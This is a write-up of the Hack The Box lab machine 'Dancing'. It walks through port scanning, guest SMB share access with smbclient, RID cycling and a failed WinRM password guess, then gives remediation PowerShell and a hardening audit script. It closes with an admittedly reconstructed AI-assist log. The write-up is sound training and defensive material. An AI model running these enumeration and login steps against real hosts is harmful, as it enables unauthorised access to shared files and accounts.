Box info
  • OS: Windows 10 / Server 2019 Build 17763 x64
  • Difficulty: Very Easy
  • Tier: 0
  • Status: Starting Point
  • Skills: SMB enumeration, null/guest session, smbclient, RID cycling
  • Pwned: 2026-04-27

TL;DR

Dancing is a Windows Server 2019 box with SMB null authentication enabled. A port scan reveals the usual Windows fingerprint: 135 (RPC), 139 (NetBIOS), 445 (SMB), and 5985 (WinRM). Guest login to SMB is accepted, and listing shares uncovers a non-standard share called WorkShares. Inside it, James.P/flag.txt contains the flag. Attempts to leverage the guest session further — WinRM, psexec, wmiexec — all fail cleanly. The lesson: a null/guest SMB session can still hand you useful information about the environment even when it can’t give you code execution.

Recon

1. Liveness check

$ ping -c 3 10.129.99.161
64 bytes from 10.129.99.161: icmp_seq=0 ttl=127 time=34.788 ms
64 bytes from 10.129.99.161: icmp_seq=1 ttl=127 time=35.418 ms
64 bytes from 10.129.99.161: icmp_seq=2 ttl=127 time=33.902 ms

TTL=127 → Windows (Windows’ default initial TTL is 128; one hop through the VPN gateway decrements it to 127). This tells us the OS family before nmap even runs.

2. Full TCP sweep

$ sudo nmap -sS -p- --min-rate 5000 10.129.99.161
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  msrpc
49665/tcp open  msrpc
49666/tcp open  msrpc
49667/tcp open  msrpc
49668/tcp open  msrpc
49669/tcp open  msrpc

Flags:

  • -sS — SYN scan (half-open); faster and stealthier than full TCP connect
  • -p- — scan all 65535 ports

The open ports tell the story immediately: this is a Windows machine with SMB (445), WinRM (5985), and a cluster of dynamic RPC ports (49664–49669, which Windows allocates at startup for DCOM).

3. Service detection on key ports

$ sudo nmap -sC -sV -p 135,139,445,5985 10.129.99.161
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2026-04-27T11:54:03
|_  delta_time: 14398s

Critical finding: Message signing enabled but not required — SMB signing is not enforced, opening the door to relay attacks. That’s beyond scope here, but worth noting for real-world assessments.

Foothold

Dead end #1 — anonymous SMB

First attempt: fully anonymous (no username, no password):

$ smbclient -N -L //10.129.99.161
session setup failed: NT_STATUS_ACCESS_DENIED

Pure anonymous is blocked. The server requires at least a guest identity.

Dead end #2 — RPC enumeration as guest

Switched to the guest account with a blank password. RPC connected, but queries fell over:

$ rpcclient -U "guest%" 10.129.99.161
rpcclient $> enumdomusers
NT_STATUS_CONNECTION_DISCONNECTED
rpcclient $> srvinfo
NT_STATUS_CONNECTION_DISCONNECTED

Guest can connect but has no RPC enumeration rights. The connection drops on any privileged query.

Working approach — SMB guest listing

smbclient with guest credentials works:

$ smbclient -U "guest%" -L //10.129.99.161

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk

ADMIN$ and C$ are administrative shares (require elevated credentials). IPC$ allows guest inter-process communication (used for RID cycling). WorkShares is the interesting one — no comment, non-standard name.

$ smbclient -U "guest%" //10.129.99.161/WorkShares
Try "help" for a list of supported commands.
smb: \> ls
  .                                   D        0  Mon Mar 29 15:22:01 2021
  ..                                  D        0  Mon Mar 29 15:22:01 2021
  Amy.J                               D        0  Mon Mar 29 15:14:01 2021
  James.P                             D        0  Mon Mar 29 15:15:01 2021

smb: \> cd James.P\
smb: \James.P\> ls
  flag.txt                            A       32  Mon Mar 29 15:16:01 2021

smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt
$ cat flag.txt
[REDACTED]

While in the share, I also grabbed the other file, from the Amy.J directory:

smb: \Amy.J\> get worknotes.txt

Contents of worknotes.txt:

- start apache server on the linux machine
- secure the ftp server
- setup winrm on dancing

This is a goldmine for context: there is a Linux machine in the environment with Apache and an FTP server (the Fawn box from the same Starting Point track). The note about setting up WinRM on Dancing confirms the port 5985 we saw.

Bonus — RID cycling via IPC$

With guest access to IPC$, RID cycling reveals local user accounts:

$ nxc smb 10.129.99.161 -u 'guest' -p '' --rid-brute
500: DANCING\Administrator (SidTypeUser)
501: DANCING\Guest (SidTypeUser)
503: DANCING\DefaultAccount (SidTypeUser)
504: DANCING\WDAGUtilityAccount (SidTypeUser)
1000: DANCING\dsc (SidTypeUser)

The built-in Administrator account (RID 500) is not renamed — a finding worth documenting even if we can’t exploit it here.

Post-Foothold Attempts (all failed)

These are documented for completeness — the machine’s intended scope ends at the flag, but it’s important methodology to try:

# WinRM with guest
$ nxc winrm 10.129.99.161 -u 'guest' -p ''
WINRM  10.129.99.161  5985  DANCING  [-] Dancing\guest: — FAIL

# WinRM password spray on Administrator
$ nxc winrm 10.129.99.161 -u 'Administrator' -p 'Dancing'
WINRM  10.129.99.161  5985  DANCING  [-] STATUS_LOGON_FAILURE

# psexec.py, wmiexec.py, atexec.py — all returned rpc_s_access_denied

Guest has read-only access to one share. No execution rights anywhere.

Privilege Escalation

N/A — Starting Point Tier 0 box. The guest SMB session provides only read access to a non-administrative share. There is no shell to escalate from. No privilege escalation path was discovered or required to obtain the flag.

What’s actually broken

  1. SMB null/guest authentication enabled (Null Auth: True). Windows SMB should not accept the built-in Guest account with a blank password in any production environment. This is controlled by the Guest account status and the RestrictAnonymous registry key.
  2. Unprotected shared folder containing credentials or flags. The WorkShares share is accessible to any authenticated (guest) user. Sensitive data should never be stored in shares accessible to the guest account.
  3. SMB signing not required. While not exploited here, Message signing enabled but not required means an attacker on the same network segment can perform SMB relay attacks (relaying a victim’s NTLM authentication to another host without ever learning the hash).
  4. Administrator account not renamed (RID 500). Trivially discoverable via RID cycling. Security-conscious configurations rename the built-in administrator to reduce its visibility.

Remediation (the boring half)

Disable guest account and restrict anonymous access:

# Disable built-in Guest account
Disable-LocalUser -Name "Guest"

# Restrict anonymous enumeration
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" `
  -Name "RestrictAnonymous" -Value 2

# Require SMB signing
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force

Remove the WorkShares share or restrict access:

# Remove the share entirely
Remove-SmbShare -Name "WorkShares" -Force

# Or restrict to specific users only
Grant-SmbShareAccess -Name "WorkShares" -AccountName "DANCING\Authorized_Users" `
  -AccessRight Full -Force
Revoke-SmbShareAccess -Name "WorkShares" -AccountName "Everyone" -Force

Rename the built-in Administrator:

Rename-LocalUser -Name "Administrator" -NewName "svc_admin_disabled"
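To confirm the remediation above actually took, here is an added audit function (not part of the original writeup) that re-checks the four findings on the host itself. It assumes only the share name WorkShares and the RestrictAnonymous key from the commands above; the function name Test-DancingHardening is mine, and everything else is built-in cmdlets.

```powershell
# Added audit example (not from the writeup). Run in an elevated PowerShell
# on the host after applying the Remediation steps above.
function Test-DancingHardening {
    param([string]$ShareName = "WorkShares")   # share name taken from the writeup
    $findings = @()

    # 1. Guest account (RID 501) must be disabled.
    $guest = Get-LocalUser | Where-Object { $_.SID.Value -like "*-501" }
    if ($guest -and $guest.Enabled) {
        $findings += "Guest account '$($guest.Name)' is still enabled"
    }

    # 1b. RestrictAnonymous must be non-zero (the Remediation above sets 2).
    $lsa = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa"
    if ([int]$lsa.RestrictAnonymous -lt 1) {
        $findings += "RestrictAnonymous is '$($lsa.RestrictAnonymous)' (expected non-zero)"
    }

    # 3. SMB signing must be required, not merely enabled.
    $smb = Get-SmbServerConfiguration
    if (-not $smb.RequireSecuritySignature) {
        $findings += "SMB signing not required (RequireSecuritySignature = False)"
    }

    # 2. The share should be gone, or at least not readable by broad principals.
    if (Get-SmbShare -Name $ShareName -ErrorAction SilentlyContinue) {
        $broad = Get-SmbShareAccess -Name $ShareName | Where-Object {
            $_.AccessControlType -eq "Allow" -and
            $_.AccountName -match "Everyone|Guest|Authenticated Users"
        }
        foreach ($ace in $broad) {
            $findings += "Share '$ShareName' grants $($ace.AccessRight) to $($ace.AccountName)"
        }
    }

    # 4. RID 500 should no longer be called Administrator.
    $admin = Get-LocalUser | Where-Object { $_.SID.Value -like "*-500" }
    if ($admin -and $admin.Name -eq "Administrator") {
        $findings += "Built-in administrator (RID 500) still named 'Administrator'"
    }

    # Return the remaining findings; an empty array means all four are fixed.
    return $findings
}

$remaining = @(Test-DancingHardening)
if ($remaining.Count -eq 0) { "All four findings remediated" } else { $remaining }
```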

MITRE ATT&CK mapping

Tactic          Technique                          How it shows up here
------          ---------                          --------------------
Reconnaissance  T1046 — Network Service Discovery  nmap scan identifies SMB on 445/tcp, WinRM on 5985
Initial Access  T1078 — Valid Accounts             Guest login with blank password accepted by SMB
Discovery       T1135 — Network Share Discovery    Listing SMB shares with smbclient -L and nxc --shares
Discovery       T1087 — Account Discovery          RID cycling via IPC$ to enumerate local user accounts
Collection      T1005 — Data from Local System     Downloading flag.txt and worknotes.txt from WorkShares

Lessons learned

  • TTL fingerprints OS at the ping stage. TTL=127 → Windows (128 minus one hop). No need to wait for nmap’s OS detection on obvious targets.
  • Guest ≠ no access. The guest account is often treated as “disabled by default and therefore safe.” In practice, Windows guest login to SMB is a frequently overlooked attack surface that yields user enumeration and sometimes file access.
  • -sC flag runs smb2-security-mode automatically. Signing status is a free piece of information from the default nmap scan. Note it every time — it tells you whether relay attacks are possible without any extra work.
  • Share contents often contain context for the rest of the environment. worknotes.txt here mentions FTP and Apache on a Linux machine — exactly the next machine in the Starting Point track. In real engagements, user files often contain passwords, internal hostnames, and network diagrams.

🤖 AI-assist log

Transparency over polish. This is exactly where Claude was in the loop on this box.

Note: AI-assist log reconstructed from writeup context; original session interaction logs not available.

Step: SMB null vs guest distinction
  What I asked: “What’s the difference between null session and guest login for SMB?”
  What Claude returned: Explained: null session = no credentials at all (empty username+password), guest = explicit Guest account with empty password. Windows Server 2019 blocks null but may allow guest depending on LocalAccountTokenFilterPolicy.
  What I changed: Used directly — important distinction for the dead-end explanation.

Step: RID cycling
  What I asked: “Why does RID cycling through IPC$ work for account enumeration?”
  What Claude returned: Explained the SID-to-name lookup via lsarpc pipe on IPC$. Noted that RestrictAnonymous=2 would block this even for authenticated guests.
  What I changed: Added the RestrictAnonymous fix to Remediation.

Step: MITRE mapping
  What I asked: “Map SMB guest share listing to ATT&CK.”
  What Claude returned: Suggested T1135 (Network Share Discovery) + T1078 (Valid Accounts).
  What I changed: Added T1087 (Account Discovery) for the RID cycling step — Claude missed it.

Step: SMB signing risk
  What I asked: “What relay attacks are possible when SMB signing is not required?”
  What Claude returned: Described NTLM relay: attacker intercepts SMB auth challenge, forwards it to another service as the victim. Tools: Responder + ntlmrelayx.
  What I changed: Summarized in “What’s actually broken” without full exploitation detail (out of scope).

  • What Claude got wrong: Nothing significant; SMB protocol details were accurate.
  • What Claude couldn’t do: Actually connect to the SMB server; no network access to HTB.
  • Net assist value: High on SMB protocol nuances and MITRE mapping; zero on execution.

References